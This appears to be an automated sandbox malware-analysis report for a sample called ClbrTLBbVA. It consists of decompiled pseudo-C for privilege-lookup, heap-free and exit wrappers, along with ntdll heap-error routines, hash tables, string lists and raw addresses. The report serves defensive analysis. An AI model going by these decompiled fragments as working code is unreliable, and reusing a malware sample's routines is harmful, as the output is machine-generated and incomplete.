                                        • Opcode ID: b10fabcb32db71a5b7eea36fe1392860f60038128f8c22098197d1e06333c4eb
                                        • Instruction ID: c56991214c4ec934080db5ba8cc66c5b0c1f150242ce01cb245a4655f8ad6c1a
                                        • Opcode Fuzzy Hash: b10fabcb32db71a5b7eea36fe1392860f60038128f8c22098197d1e06333c4eb
                                        • Instruction Fuzzy Hash: 39F02831A8021876EB106A419D43FBF7318AB80F54F15406EFE04BA1C2E9BD295602EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 269 41a7c1-41a7ea call 41af60 271 41a7ef-41a804 LookupPrivilegeValueW 269->271
                                        C-Code - Quality: 37%
                                        			E0041A7C1(void* __eax, void* __ebx, void* __esi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                        				char _v1;
                                        				int _t12;
                                        				void* _t18;
                                        
                                        				asm("in al, dx");
                                        				asm("out 0xb2, eax");
                                        				_push( &_v1);
                                        				E0041AF60(_t18, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46, 0xec8b557e);
                                        				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                        				return _t12;
                                        			}







                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 36880e488c94ab2ef659b49dd10dee1059cd8d93b727595a6230eda0b513fbb1
                                        • Instruction ID: d7fd77a1f58c8e657c7d4f6a89aa0069368a39e55173c9c77418211e55863ec0
                                        • Opcode Fuzzy Hash: 36880e488c94ab2ef659b49dd10dee1059cd8d93b727595a6230eda0b513fbb1
                                        • Instruction Fuzzy Hash: 96E0A0B16001186BC710DF58CC80EE737A99F48350F1181A4B94CAB241C535D85287A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 272 41a670-41a686 273 41a68c-41a6a1 RtlFreeHeap 272->273 274 41a687 call 41af60 272->274 274->273
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 275 41a7d0-41a7e9 276 41a7ef-41a804 LookupPrivilegeValueW 275->276 277 41a7ea call 41af60 275->277 277->276
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0041A6A2(intOrPtr _a4, int _a8) {
                                        				signed int _v117;
                                        				intOrPtr* _t11;
                                        				signed int _t13;
                                        				void* _t15;
                                        				intOrPtr* _t16;
                                        
                                        				 *_t16 = 0x87478d76;
                                        				 *_t11 =  *_t11 - _t13;
                                        				_v117 = _v117 & _t13;
                                        				E0041AF60(_t15, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t16);
                                        				ExitProcess(_a8);
                                        			}









                                        APIs
                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: ecff81ba1d17dda28dd7c3846c16624701e9300bcc84ce188d6bf8f56c725f29
                                        • Instruction ID: eed93968c2115ab8db4c4cf596e675c4ae5d8600dd65f113d43f7854faf3fd73
                                        • Opcode Fuzzy Hash: ecff81ba1d17dda28dd7c3846c16624701e9300bcc84ce188d6bf8f56c725f29
                                        • Instruction Fuzzy Hash: 7BE04671A40204BBC724CF64C889EDB3BA8EF49794F248569F96CAB651C235A601CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0041A6B0(intOrPtr _a4, int _a8) {
                                        				void* _t10;
                                        				void* _t11;
                                        
                                        				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
                                        				ExitProcess(_a8);
                                        			}






                                        APIs
                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 0b41bde2c0bc46780f90ebfe1f7fd4545ac8b2a00bb184d05eacfd265915b56e
                                        • Instruction ID: 74948f5a2e4a7c25a01045f0ae3ff3828075c44fadd82f8fa6d392f45cbb6c90
                                        • Opcode Fuzzy Hash: 0b41bde2c0bc46780f90ebfe1f7fd4545ac8b2a00bb184d05eacfd265915b56e
                                        • Instruction Fuzzy Hash: C3B09B719024D5C5E615D7A44E0C7177A447BD1745F17C156D2020651B4778D0D1F5B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        • <unknown>, xrefs: 0175B27E, 0175B2D1, 0175B350, 0175B399, 0175B417, 0175B48E
                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0175B47D
                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0175B48F
                                        • This failed because of error %Ix., xrefs: 0175B446
                                        • The instruction at %p tried to %s , xrefs: 0175B4B6
                                        • *** enter .cxr %p for the context, xrefs: 0175B50D
                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0175B3D6
                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0175B323
                                        • write to, xrefs: 0175B4A6
                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0175B2F3
                                        • The critical section is owned by thread %p., xrefs: 0175B3B9
                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0175B484
                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0175B39B
                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0175B476
                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0175B53F
                                        • *** then kb to get the faulting stack, xrefs: 0175B51C
                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0175B2DC
                                        • a NULL pointer, xrefs: 0175B4E0
                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0175B38F
                                        • The resource is owned exclusively by thread %p, xrefs: 0175B374
                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0175B314
                                        • Go determine why that thread has not released the critical section., xrefs: 0175B3C5
                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0175B305
                                        • *** Inpage error in %ws:%s, xrefs: 0175B418
                                        • read from, xrefs: 0175B4AD, 0175B4B2
                                        • *** enter .exr %p for the exception record, xrefs: 0175B4F1
                                        • The resource is owned shared by %d threads, xrefs: 0175B37E
                                        • The instruction at %p referenced memory at %p., xrefs: 0175B432
                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0175B352
                                        • an invalid address, %p, xrefs: 0175B4CF
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • API String ID: 0-108210295
                                        • Opcode ID: e22c19999d51863a03ff8421725843e387242cdfc2e075a5532b6fd6dee9ed37
                                        • Instruction ID: 2c75e8322c297ace579989259d880b4ff6175583ab9b4f81245c08449d9edace
                                        • Opcode Fuzzy Hash: e22c19999d51863a03ff8421725843e387242cdfc2e075a5532b6fd6dee9ed37
                                        • Instruction Fuzzy Hash: 2A81F475A40200FFDF265A4ACC4AD7BBF2BEF96A51F404098F9052B117D3B18551C7B2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 44%
                                        			E01761C06() {
                                        				signed int _t27;
                                        				char* _t104;
                                        				char* _t105;
                                        				intOrPtr _t113;
                                        				intOrPtr _t115;
                                        				intOrPtr _t117;
                                        				intOrPtr _t119;
                                        				intOrPtr _t120;
                                        
                                        				_t105 = 0x16848a4;
                                        				_t104 = "HEAP: ";
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        					_push(_t104);
                                        					E016AB150();
                                        				} else {
                                        					E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        				}
                                        				_push( *0x179589c);
                                        				E016AB150("Heap error detected at %p (heap handle %p)\n",  *0x17958a0);
                                        				_t27 =  *0x1795898; // 0x0
                                        				if(_t27 <= 0xf) {
                                        					switch( *((intOrPtr*)(_t27 * 4 +  &M01761E96))) {
                                        						case 0:
                                        							_t105 = "heap_failure_internal";
                                        							goto L21;
                                        						case 1:
                                        							goto L21;
                                        						case 2:
                                        							goto L21;
                                        						case 3:
                                        							goto L21;
                                        						case 4:
                                        							goto L21;
                                        						case 5:
                                        							goto L21;
                                        						case 6:
                                        							goto L21;
                                        						case 7:
                                        							goto L21;
                                        						case 8:
                                        							goto L21;
                                        						case 9:
                                        							goto L21;
                                        						case 0xa:
                                        							goto L21;
                                        						case 0xb:
                                        							goto L21;
                                        						case 0xc:
                                        							goto L21;
                                        						case 0xd:
                                        							goto L21;
                                        						case 0xe:
                                        							goto L21;
                                        						case 0xf:
                                        							goto L21;
                                        					}
                                        				}
                                        				L21:
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        					_push(_t104);
                                        					E016AB150();
                                        				} else {
                                        					E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        				}
                                        				_push(_t105);
                                        				E016AB150("Error code: %d - %s\n",  *0x1795898);
                                        				_t113 =  *0x17958a4; // 0x0
                                        				if(_t113 != 0) {
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        						_push(_t104);
                                        						E016AB150();
                                        					} else {
                                        						E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        					}
                                        					E016AB150("Parameter1: %p\n",  *0x17958a4);
                                        				}
                                        				_t115 =  *0x17958a8; // 0x0
                                        				if(_t115 != 0) {
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        						_push(_t104);
                                        						E016AB150();
                                        					} else {
                                        						E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        					}
                                        					E016AB150("Parameter2: %p\n",  *0x17958a8);
                                        				}
                                        				_t117 =  *0x17958ac; // 0x0
                                        				if(_t117 != 0) {
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        						_push(_t104);
                                        						E016AB150();
                                        					} else {
                                        						E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        					}
                                        					E016AB150("Parameter3: %p\n",  *0x17958ac);
                                        				}
                                        				_t119 =  *0x17958b0; // 0x0
                                        				if(_t119 != 0) {
                                        					L41:
                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        						_push(_t104);
                                        						E016AB150();
                                        					} else {
                                        						E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        					}
                                        					_push( *0x17958b4);
                                        					E016AB150("Last known valid blocks: before - %p, after - %p\n",  *0x17958b0);
                                        				} else {
                                        					_t120 =  *0x17958b4; // 0x0
                                        					if(_t120 != 0) {
                                        						goto L41;
                                        					}
                                        				}
                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                        					_push(_t104);
                                        					E016AB150();
                                        				} else {
                                        					E016AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                        				}
                                        				return E016AB150("Stack trace available at %p\n", 0x17958c0);
                                        			}












                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                        • API String ID: 0-2897834094
                                        • Opcode ID: c69f0341701800fa577215698913be6ba605ed72dcc8d69057f820d0ece13d07
                                        • Instruction ID: e5a62b5220e90456b1e528d6ef88fcdb901f144f8799f1dede1b21aa6bda1bce
                                        • Opcode Fuzzy Hash: c69f0341701800fa577215698913be6ba605ed72dcc8d69057f820d0ece13d07
                                        • Instruction Fuzzy Hash: BB61E332951151DFD712EB89DC88E25B3ADEB54932B8981AEFC0A5F300D621AC81CF0E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E016B3D34(signed int* __ecx) {
                                        				signed int* _v8;
                                        				char _v12;
                                        				signed int* _v16;
                                        				signed int* _v20;
                                        				char _v24;
                                        				signed int _v28;
                                        				signed int _v32;
                                        				char _v36;
                                        				signed int _v40;
                                        				signed int _v44;
                                        				signed int* _v48;
                                        				signed int* _v52;
                                        				signed int _v56;
                                        				signed int _v60;
                                        				char _v68;
                                        				signed int _t140;
                                        				signed int _t161;
                                        				signed int* _t236;
                                        				signed int* _t242;
                                        				signed int* _t243;
                                        				signed int* _t244;
                                        				signed int* _t245;
                                        				signed int _t255;
                                        				void* _t257;
                                        				signed int _t260;
                                        				void* _t262;
                                        				signed int _t264;
                                        				void* _t267;
                                        				signed int _t275;
                                        				signed int* _t276;
                                        				short* _t277;
                                        				signed int* _t278;
                                        				signed int* _t279;
                                        				signed int* _t280;
                                        				short* _t281;
                                        				signed int* _t282;
                                        				short* _t283;
                                        				signed int* _t284;
                                        				void* _t285;
                                        
                                        				_v60 = _v60 | 0xffffffff;
                                        				_t280 = 0;
                                        				_t242 = __ecx;
                                        				_v52 = __ecx;
                                        				_v8 = 0;
                                        				_v20 = 0;
                                        				_v40 = 0;
                                        				_v28 = 0;
                                        				_v32 = 0;
                                        				_v44 = 0;
                                        				_v56 = 0;
                                        				_t275 = 0;
                                        				_v16 = 0;
                                        				if(__ecx == 0) {
                                        					_t280 = 0xc000000d;
                                        					_t140 = 0;
                                        					L50:
                                        					 *_t242 =  *_t242 | 0x00000800;
                                        					_t242[0x13] = _t140;
                                        					_t242[0x16] = _v40;
                                        					_t242[0x18] = _v28;
                                        					_t242[0x14] = _v32;
                                        					_t242[0x17] = _t275;
                                        					_t242[0x15] = _v44;
                                        					_t242[0x11] = _v56;
                                        					_t242[0x12] = _v60;
                                        					return _t280;
                                        				}
                                        				if(E016B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                        					_v56 = 1;
                                        					if(_v8 != 0) {
                                        						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                        					}
                                        					_v8 = _t280;
                                        				}
                                        				if(E016B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                        					_v60 =  *_v8;
                                        					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                        					_v8 = _t280;
                                        				}
                                        				if(E016B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                        					L16:
                                        					if(E016B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                        						L28:
                                        						if(E016B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                        							L46:
                                        							_t275 = _v16;
                                        							L47:
                                        							_t161 = 0;
                                        							L48:
                                        							if(_v8 != 0) {
                                        								L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                        							}
                                        							_t140 = _v20;
                                        							if(_t140 != 0) {
                                        								if(_t275 != 0) {
                                        									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                        									_t275 = 0;
                                        									_v28 = 0;
                                        									_t140 = _v20;
                                        								}
                                        							}
                                        							goto L50;
                                        						}
                                        						_t167 = _v12;
                                        						_t255 = _v12 + 4;
                                        						_v44 = _t255;
                                        						if(_t255 == 0) {
                                        							_t276 = _t280;
                                        							_v32 = _t280;
                                        						} else {
                                        							_t276 = L016C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                        							_t167 = _v12;
                                        							_v32 = _t276;
                                        						}
                                        						if(_t276 == 0) {
                                        							_v44 = _t280;
                                        							_t280 = 0xc0000017;
                                        							goto L46;
                                        						} else {
                                        							E016EF3E0(_t276, _v8, _t167);
                                        							_v48 = _t276;
                                        							_t277 = E016F1370(_t276, 0x1684e90);
                                        							_pop(_t257);
                                        							if(_t277 == 0) {
                                        								L38:
                                        								_t170 = _v48;
                                        								if( *_v48 != 0) {
                                        									E016EBB40(0,  &_v68, _t170);
                                        									if(L016B43C0( &_v68,  &_v24) != 0) {
                                        										_t280 =  &(_t280[0]);
                                        									}
                                        								}
                                        								if(_t280 == 0) {
                                        									_t280 = 0;
                                        									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                        									_v44 = 0;
                                        									_v32 = 0;
                                        								} else {
                                        									_t280 = 0;
                                        								}
                                        								_t174 = _v8;
                                        								if(_v8 != 0) {
                                        									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                        								}
                                        								_v8 = _t280;
                                        								goto L46;
                                        							}
                                        							_t243 = _v48;
                                        							do {
                                        								 *_t277 = 0;
                                        								_t278 = _t277 + 2;
                                        								E016EBB40(_t257,  &_v68, _t243);
                                        								if(L016B43C0( &_v68,  &_v24) != 0) {
                                        									_t280 =  &(_t280[0]);
                                        								}
                                        								_t243 = _t278;
                                        								_t277 = E016F1370(_t278, 0x1684e90);
                                        								_pop(_t257);
                                        							} while (_t277 != 0);
                                        							_v48 = _t243;
                                        							_t242 = _v52;
                                        							goto L38;
                                        						}
                                        					}
                                        					_t191 = _v12;
                                        					_t260 = _v12 + 4;
                                        					_v28 = _t260;
                                        					if(_t260 == 0) {
                                        						_t275 = _t280;
                                        						_v16 = _t280;
                                        					} else {
                                        						_t275 = L016C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                        						_t191 = _v12;
                                        						_v16 = _t275;
                                        					}
                                        					if(_t275 == 0) {
                                        						_v28 = _t280;
                                        						_t280 = 0xc0000017;
                                        						goto L47;
                                        					} else {
                                        						E016EF3E0(_t275, _v8, _t191);
                                        						_t285 = _t285 + 0xc;
                                        						_v48 = _t275;
                                        						_t279 = _t280;
                                        						_t281 = E016F1370(_v16, 0x1684e90);
                                        						_pop(_t262);
                                        						if(_t281 != 0) {
                                        							_t244 = _v48;
                                        							do {
                                        								 *_t281 = 0;
                                        								_t282 = _t281 + 2;
                                        								E016EBB40(_t262,  &_v68, _t244);
                                        								if(L016B43C0( &_v68,  &_v24) != 0) {
                                        									_t279 =  &(_t279[0]);
                                        								}
                                        								_t244 = _t282;
                                        								_t281 = E016F1370(_t282, 0x1684e90);
                                        								_pop(_t262);
                                        							} while (_t281 != 0);
                                        							_v48 = _t244;
                                        							_t242 = _v52;
                                        						}
                                        						_t201 = _v48;
                                        						_t280 = 0;
                                        						if( *_v48 != 0) {
                                        							E016EBB40(_t262,  &_v68, _t201);
                                        							if(L016B43C0( &_v68,  &_v24) != 0) {
                                        								_t279 =  &(_t279[0]);
                                        							}
                                        						}
                                        						if(_t279 == 0) {
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                        							_v28 = _t280;
                                        							_v16 = _t280;
                                        						}
                                        						_t202 = _v8;
                                        						if(_v8 != 0) {
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                        						}
                                        						_v8 = _t280;
                                        						goto L28;
                                        					}
                                        				}
                                        				_t214 = _v12;
                                        				_t264 = _v12 + 4;
                                        				_v40 = _t264;
                                        				if(_t264 == 0) {
                                        					_v20 = _t280;
                                        				} else {
                                        					_t236 = L016C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                        					_t280 = _t236;
                                        					_v20 = _t236;
                                        					_t214 = _v12;
                                        				}
                                        				if(_t280 == 0) {
                                        					_t161 = 0;
                                        					_t280 = 0xc0000017;
                                        					_v40 = 0;
                                        					goto L48;
                                        				} else {
                                        					E016EF3E0(_t280, _v8, _t214);
                                        					_t285 = _t285 + 0xc;
                                        					_v48 = _t280;
                                        					_t283 = E016F1370(_t280, 0x1684e90);
                                        					_pop(_t267);
                                        					if(_t283 != 0) {
                                        						_t245 = _v48;
                                        						do {
                                        							 *_t283 = 0;
                                        							_t284 = _t283 + 2;
                                        							E016EBB40(_t267,  &_v68, _t245);
                                        							if(L016B43C0( &_v68,  &_v24) != 0) {
                                        								_t275 = _t275 + 1;
                                        							}
                                        							_t245 = _t284;
                                        							_t283 = E016F1370(_t284, 0x1684e90);
                                        							_pop(_t267);
                                        						} while (_t283 != 0);
                                        						_v48 = _t245;
                                        						_t242 = _v52;
                                        					}
                                        					_t224 = _v48;
                                        					_t280 = 0;
                                        					if( *_v48 != 0) {
                                        						E016EBB40(_t267,  &_v68, _t224);
                                        						if(L016B43C0( &_v68,  &_v24) != 0) {
                                        							_t275 = _t275 + 1;
                                        						}
                                        					}
                                        					if(_t275 == 0) {
                                        						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                        						_v40 = _t280;
                                        						_v20 = _t280;
                                        					}
                                        					_t225 = _v8;
                                        					if(_v8 != 0) {
                                        						L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                        					}
                                        					_v8 = _t280;
                                        					goto L16;
                                        				}
                                        			}










































                                        0x016b4046
                                        0x016b4046
                                        0x016b4044
                                        0x016b4049
                                        0x01708327
                                        0x01708334
                                        0x01708339
                                        0x0170833c
                                        0x016b404f
                                        0x016b404f
                                        0x016b404f
                                        0x016b4051
                                        0x016b4056
                                        0x016b4063
                                        0x016b4063
                                        0x016b4068
                                        0x00000000
                                        0x016b4068
                                        0x016b3fdf
                                        0x016b3fe2
                                        0x016b3fe4
                                        0x016b3fe7
                                        0x016b3fef
                                        0x016b4003
                                        0x016b4005
                                        0x016b4005
                                        0x016b400c
                                        0x016b4013
                                        0x016b4016
                                        0x016b4017
                                        0x016b401b
                                        0x016b401e
                                        0x00000000
                                        0x016b401e
                                        0x016b3fb6
                                        0x016b3eb1
                                        0x016b3eb4
                                        0x016b3eb7
                                        0x016b3ebc
                                        0x017082a9
                                        0x017082ab
                                        0x016b3ec2
                                        0x016b3ed3
                                        0x016b3ed5
                                        0x016b3ed8
                                        0x016b3ed8
                                        0x016b3edd
                                        0x017082b3
                                        0x017082b6
                                        0x00000000
                                        0x016b3ee3
                                        0x016b3ee8
                                        0x016b3eed
                                        0x016b3ef0
                                        0x016b3ef3
                                        0x016b3f02
                                        0x016b3f05
                                        0x016b3f08
                                        0x017082c0
                                        0x017082c3
                                        0x017082c5
                                        0x017082c8
                                        0x017082d0
                                        0x017082e4
                                        0x017082e6
                                        0x017082e6
                                        0x017082ed
                                        0x017082f4
                                        0x017082f7
                                        0x017082f8
                                        0x017082fc
                                        0x017082ff
                                        0x017082ff
                                        0x016b3f0e
                                        0x016b3f11
                                        0x016b3f16
                                        0x016b3f1d
                                        0x016b3f31
                                        0x01708307
                                        0x01708307
                                        0x016b3f31
                                        0x016b3f39
                                        0x016b3f48
                                        0x016b3f4d
                                        0x016b3f50
                                        0x016b3f50
                                        0x016b3f53
                                        0x016b3f58
                                        0x016b3f65
                                        0x016b3f65
                                        0x016b3f6a
                                        0x00000000
                                        0x016b3f6a
                                        0x016b3edd
                                        0x016b3dda
                                        0x016b3ddd
                                        0x016b3de0
                                        0x016b3de5
                                        0x01708245
                                        0x016b3deb
                                        0x016b3df7
                                        0x016b3dfc
                                        0x016b3dfe
                                        0x016b3e01
                                        0x016b3e01
                                        0x016b3e06
                                        0x0170824d
                                        0x0170824f
                                        0x01708254
                                        0x00000000
                                        0x016b3e0c
                                        0x016b3e11
                                        0x016b3e16
                                        0x016b3e19
                                        0x016b3e29
                                        0x016b3e2c
                                        0x016b3e2f
                                        0x0170825c
                                        0x0170825f
                                        0x01708261
                                        0x01708264
                                        0x0170826c
                                        0x01708280
                                        0x01708282
                                        0x01708282
                                        0x01708289
                                        0x01708290
                                        0x01708293
                                        0x01708294
                                        0x01708298
                                        0x0170829b
                                        0x0170829b
                                        0x016b3e35
                                        0x016b3e38
                                        0x016b3e3d
                                        0x016b3e44
                                        0x016b3e58
                                        0x017082a3
                                        0x017082a3
                                        0x016b3e58
                                        0x016b3e60
                                        0x016b3e6f
                                        0x016b3e74
